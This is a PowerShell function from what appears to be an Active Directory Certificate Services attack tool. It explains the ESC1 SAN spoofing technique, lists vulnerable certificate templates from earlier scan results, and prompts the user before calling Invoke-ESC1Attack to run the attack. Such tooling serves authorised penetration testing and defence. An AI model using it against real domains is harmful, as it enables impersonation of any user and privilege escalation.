Private/Show-ESC1AttackDetails.ps1
|
function Show-ESC1AttackDetails { <# .SYNOPSIS Shows ESC1 attack details and offers attack execution. #> [CmdletBinding()] param ( [Parameter(Mandatory)] [array]$Results, [Parameter()] [object]$Principal ) Write-Host "=== ESC1: SAN Spoofing Attack ===" -ForegroundColor Red Write-Host "" Write-Host "Attack Description:" -ForegroundColor Yellow Write-Host "The principal can request certificates with arbitrary Subject Alternative Names" -ForegroundColor White Write-Host "from templates that allow enrollee-supplied subjects and have Client Authentication EKU." -ForegroundColor White Write-Host "This enables impersonation of any user or computer in the domain." -ForegroundColor White Write-Host "" # Collect all vulnerable templates from all results $allTemplates = @() foreach ($result in $Results) { if ($result.ESC1Issues -and $result.ESC1Issues.Count -gt 0) { foreach ($issue in $result.ESC1Issues) { $templateName = if ($issue.DirectoryEntry -and $issue.DirectoryEntry.Properties['name'].Value) { $issue.DirectoryEntry.Properties['name'].Value } else { "Unknown Template" } $allTemplates += [PSCustomObject]@{ TemplateName = $templateName PrincipalName = $result.PrincipalName Issue = $issue Result = $result } } } } $uniqueTemplates = @($allTemplates | Group-Object TemplateName | ForEach-Object { [PSCustomObject]@{ TemplateName = $_.Name Issues = $_.Group IssueCount = $_.Count } }) if ($uniqueTemplates.Count -eq 0) { Write-Host "No vulnerable templates found." -ForegroundColor Red return } Write-Host "Vulnerable Templates:" -ForegroundColor Yellow Write-Host "" for ($i = 0; $i -lt $uniqueTemplates.Count; $i++) { $template = $uniqueTemplates[$i] Write-Host " $($i + 1). $($template.TemplateName)" -ForegroundColor White } Write-Host "" Write-Host "Attack Steps:" -ForegroundColor Yellow Write-Host "1. Request a certificate from a vulnerable template with a SAN of a privileged account" -ForegroundColor Gray Write-Host "2. Use the certificate to authenticate as the privileged account (PKINIT)" -ForegroundColor Gray Write-Host "" Write-Host "Risk Level: CRITICAL - Immediate exploitation possible" -ForegroundColor Red Write-Host "" # Offer attack execution for current user if (-not $Principal) { Write-Host "Do you want to execute the ESC1 attack now? (y/N): " -NoNewline -ForegroundColor Yellow $response = Read-Host if ($response.Trim().ToLower() -eq 'y') { foreach ($result in $Results) { Invoke-ESC1Attack -TemplateObject $result.ESC1Issues[0].DirectoryEntry } } } } |